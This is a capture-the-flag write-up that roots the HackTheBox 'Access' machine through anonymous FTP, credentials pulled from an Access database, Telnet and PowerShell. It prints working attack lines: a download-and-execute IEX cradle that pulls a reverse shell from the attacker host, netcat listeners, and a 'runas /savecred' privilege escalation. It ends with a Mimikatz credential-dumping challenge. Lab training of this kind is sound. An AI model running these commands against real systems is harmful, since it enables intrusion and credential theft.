How are you doing?
This time I will show you how to root the ‘Access’ VM from HackTheBox.
As in my other write-ups, I will focus on the methodology and the steps required so that you can root the box on your own.
Table of contents
1. Port scanning
2. Port filtering
3. Service enumeration
4. FTP
5. Telnet
6. HTTP
7. Analyse Microsoft Access Database
8. ZIP File extraction
9. Telnet Login
10. Reverse Shell through PowerShell
11. Local enumeration
12. Privilege Escalation
13. Challenge
1. Ping & Port Scanning
As always, I like to start by scanning the machine for open ports. We need an overview of our target. Because we don’t know how our target is configured, we should take small steps. So let us ping the machine.
ping -c 3 10.10.10.98
Notice the TTL (Time-To-Live) is 127. But what is TTL?
Do some research and try to find out on your own.
You should practice it!
When you find the information you need, then you can go forward.
But what do we need to know?
This is a great question, and to become better it’s necessary to be able to find the solution on your own. So take a step back and create an overview for yourself. Also, you should ask yourself:
What do I need?
What is my goal (for this part!)?
It’s always easy once you see the solution. Every machine looks pretty easy if you know how to root it. The most difficult part is to find a way in on your own.
So do some research before you continue.
Some useful resources you should find are:
Now we know that the OS is most likely Windows.
Let us enumerate the open ports of this machine by using Nmap.
If you’re not familiar with Nmap, you should do some research. It is an essential tool which most penetration testers use.
nmap 10.10.10.98 -Pn -n -p- --open -oN allports.nmap --stats-every 30s --max-retries 2 -T5
Alright, what do we have so far?
- OS: Windows (most likely)
2. Port filtering
On other machines you may discover many more open ports, and it could be a pain to type them manually.
Let us filter these by using Bash.
cat allports.nmap | grep tcp | cut -d"/" -f1 | tr "\n" "," | sed 's/.$//g'
If you don’t understand the command, you can visit this site to get a better understanding of it: https://explainshell.com/
Now we can save the output of it in a variable.
PORTS=$(cat allports.nmap | grep tcp | cut -d"/" -f1 | tr "\n" "," | sed 's/.$//g')
To verify that it looks right, we should ‘echo’ it.
And now we can proceed.
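A more robust version of the same port filter, added here as an example (it is not from the original write-up); the Nmap output it parses is a constructed sample, and it also keeps closed or filtered ports out of the list when the scan was run without --open:

```shell
# Added example (not from the original write-up): build the comma-separated port
# list that nmap's -p option expects from an `nmap -oN` normal-output file.
# Unlike `grep tcp | cut | tr | sed`, it only keeps lines that really are open
# TCP ports, so closed/filtered ports are excluded and there is no trailing
# comma to trim afterwards.

# Constructed sample of what allports.nmap looks like (not real scan output).
SAMPLE_NMAP='# Nmap 7.70 scan initiated as: nmap 10.10.10.98 -Pn -n -p- -oN allports.nmap
Nmap scan report for 10.10.10.98
Host is up (0.040s latency).
Not shown: 65531 filtered ports
PORT    STATE    SERVICE
21/tcp  open     ftp
23/tcp  open     telnet
80/tcp  open     http
445/tcp filtered microsoft-ds

# Nmap done -- 1 IP address (1 host up) scanned in 300.00 seconds'

# open_tcp_ports [FILE]: print the open TCP ports as "21,23,80".
# Reads FILE, or standard input when no file is given.
open_tcp_ports() {
    awk '
        # $1 looks like "21/tcp" and $2 is the state; only open TCP ports count.
        $1 ~ /^[0-9]+\/tcp$/ && $2 == "open" {
            split($1, parts, "/")
            ports = ports (ports == "" ? "" : ",") parts[1]
        }
        END { print ports }
    ' "$@"
}

# Standalone usage: feed the constructed sample and store the result the same
# way the write-up stores $PORTS for the later service scan.
PORTS=$(printf '%s\n' "$SAMPLE_NMAP" | open_tcp_ports)
echo "Open TCP ports: $PORTS"
```

The function reads a real file just as well: `PORTS=$(open_tcp_ports allports.nmap)`.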
3. Service enumeration
Service enumeration is the part where we try to find out more about the running services. Enumeration doesn’t only mean collecting as much information as possible; you also have to build an overview from all the information you have received.
Let us use Nmap for a service scan and the Nmap Scripting Engine (NSE) to collect more information about the running services.
nmap 10.10.10.98 -p$PORTS -sV -sC -oN services.nmap --stats-every 30s --max-retries 2
Here is what our results look like:
Look closely at the information we’ve got so far.
Every piece of information in this result is crucial for us.
You should append the info we just found to our previous overview.
You also should notice the Telnet line. Take a closer look at it. What exactly do you see there?
There is a question mark. Right. What could this mean?
[Important] Train your research skills and try to find it out on your own.
Sometimes it can be essential to search for information like this little thing.
4. FTP
Let us take a look at the FTP server. You should have noticed from the previous Nmap scan that ‘Anonymous login allowed’. So let’s use it.
By looking into these directories, we found some interesting files.
Now we have to download them. I will show you two different ways to do it.
We can use FTP with the ‘get’ command, or we can use ‘wget’ to download these files.
But first, we have to stay organised. So we create an FTP directory where we will store the files.
You should read the manual of ‘wget’ to understand the command, and find out what the PASV mode of an FTP server is.
Before we begin to analyse the files, let us enumerate the other services too.
Did you find out what the question mark means?
5. Telnet
Now we will take a look at this service by using telnet.
You will notice that it will take a few seconds before the login prompt appears.
That is the reason for the question mark in the Nmap scan. Nmap couldn’t identify this service as Telnet because the response took too long, but because Telnet normally runs on TCP port 23 it reported that it might be Telnet.
We don’t have any credentials to log in yet, and starting to bruteforce this service doesn’t make sense without any information about the ‘organisation’ or the machine we are trying to root. If we don’t find any useful information, we can try to bruteforce it later, but for now let us take a look at the Web server.
6. HTTP
First, we should just interact with the Web server. Let us visit it.
Here we can download the image for later analysis.
Also, we want to know what the response headers look like. Which methods does ‘OPTIONS’ report as allowed?
The questions you should ask yourself:
- Are there some security headers?
- What kinds of security headers exist?
Again, train your research skills and learn new things. Use all search engines and methods you know to find out the information you don’t know.
From this point, we want to spider the Web server to find out which directories on it exist.
Therefore we will use Burp Suite.
After setting up our proxy settings and configuring our target in Burp, we can send another GET request to the Web server and intercept it. By sending it to Spider in Burp, it will hopefully find some useful files or directories.
By clicking on Action you can send the request to Spider in Burp.
Burp Spider is a crawler which is used to map a Web server.
Our results show that we don’t have much here:
From here we can take another step and bruteforce the Web server with GET requests for different files and directories. There are a lot of tools for this, like gobuster, dirbuster, dirb and dirsearch.
In this example, I will use dirsearch. It isn’t installed in Kali Linux by default.
You can download dirsearch from its repository by using the following command:
git clone https://github.com/maurosoria/dirsearch.git /opt/dirsearch/
Also, to make it globally executable, you can create a symbolic link:
ln -s /opt/dirsearch/dirsearch.py /usr/local/bin/dirsearch
Running it will show you all the options it has. Now let us enumerate the Web server with it.
dirsearch -u http://10.10.10.98 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 10 --max-retries=2 -e html,jpg,png,xml,aspx,asp,htm,asmx,dll,db
Unfortunately, there is nothing interesting on the Web server. Another tool we can use is nikto.
This will provide us with a lot of information:
You should always note all of the information collected so far during the process.
Let’s move on.
7. Microsoft Access Database
At this point, we should determine the file types of the files we are working with.
This can be done with a tool called ‘file’.
file Access\ Control.zip
Another way to find more information is to use ‘exiftool’.
Notice that ‘exiftool’ couldn’t determine the file type. So we have to do it manually.
Ok Google: mdb file
On the first result page, you will be able to find this URL: https://fileinfo.com/extension/mdb
It provides us with the information we need.
I can’t repeat it often enough: note it!
Ok, Google: extract mdb data kali
Here you will find a website called http://mdbtools.sourceforge.net/install/x53.htm.
By using ‘mdbtools’ we can work with this file. Let us take a look at what it looks like inside.
Ok. We have to structure it to make it easily readable.
We see the auth_user table inside. Let’s export the data from this table.
mdb-export backup.mdb auth_user | tr “,” " " | grep “\”" | cut -d" " -f2-3 | sed ‘s/\"//g’ | tr " " “:”
Also, we should save this information.
mdb-export backup.mdb auth_user | tr “,” " " | grep “\”" | cut -d" " -f2-3 | sed ‘s/\"//g’ | tr " " “:” > creds.txt
Another way we can use is the following:
mdb-export backup.mdb auth_user | tr “,” " " | column -t
8. ZIP File extraction
The next file is our ZIP archive. We want to know what’s inside it.
unzip Access\ Control.zip
Do some research. Find out why this error appears.
7z e Access\ Control.zip
Now it’s asking us for a password. Did we find some credentials already?
Let us try to use them:
We extracted a file called ‘Access Control.pst’. What kind of file is it?
file Access\ Control.pst
Find out a way on your own to read the content.
cat 'Access Control.mbox' | head -n 25
9. Telnet Login
At this point, we found other credentials which we can use.
Let us try to log in by using these.
We could successfully log in using the credentials we found in the ZIP file.
Now it’s time for local enumeration, but first, it’s always better to work with a reverse shell.
Make sure you understand how a reverse shell works, because it’s an essential part of this whole field.
10. Reverse Shell through PowerShell
But before we can obtain a reverse shell, we have to plan it, understand how it should work and what the whole scenario will look like.
We have to force our target to connect back to us. …(cough) firewalls (cough)…
What do we need:
- Reverse shell script
- Web server
- Execution command
1. Reverse shell Script
Nishang is an excellent collection of different PowerShell scripts. We will use one of these to obtain our reverse shell. We will copy it to our working directory.
We want to make sure that our target machine will execute it directly, so we have to make some changes for that. Looking into the reverse shell script, we will see an example:
We will copy this line to the end of the file and remove the “PS >”. After these changes it will look like this:
2. Web server
There are a lot of methods to share files. This time we will use the Python 3 http.server module, started in the directory where we stored our script.
python3 -m http.server 80
3. Listener
After that, we have to start our listener on the port we set in the script before. In my case, it was TCP port 2201. Therefore I will use Netcat.
nc -nlvp 2201
4. Execution command
The execution command for this will be:
C:\Users\security> powershell -c IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/revshell.ps1')
11. Local enumeration
411Hall created an awesome PowerShell enumeration script called JAWS to identify privilege escalation vectors quickly.
We will let our target system download and execute it the same way we did it with the reverse shell.
It will take a few minutes. So don’t quit the session.
The most interesting part is this one:
Also, let us take a look at the desktop of the ‘security’ user.
So it seems we have here some stored credentials for the Administrator on this machine.
If we don’t know how to export them, what else could we do?
12. Privilege Escalation
Let us ask Google:
Ok, Google: windows currently stored credentials privilege escalation
Here too, on the first result page, you will find swisskyrepo’s GitHub repository with his Windows Privilege Escalation cheat sheet.
If we press CTRL+F and search for “stored credentials”, we will see this example:
Ok. Do we need an EXE file or can we do something else?
What do you think about another reverse shell but this time with Administrator privileges?
Go back to 10. Reverse Shell through PowerShell if you don’t know how it works or what it should look like. But I think this should be clear by now. It’s the same scenario in this situation.
- We will just change the TCP port of our reverse shell script to 2202.
- Run our python web server.
- Set up our listener on TCP port 2202.
- Execute it the same way with PowerShell with the currently stored credentials.
1. Reverse Shell Script
2. Web server
python3 -m http.server 80
3. Listener
nc -nlvp 2202
4. Execution command
PS C:\Users\security> runas /savecred /user:ACCESS\Administrator "powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/revshell.ps1')"
13. Challenge
For this challenge, your goals will be:
- A Meterpreter session
- Upload Mimikatz and read the credentials
- The use of Empire or its scripts is forbidden for this challenge.
YouTube video coming soon!
Official Website: https://www.shell-affect.com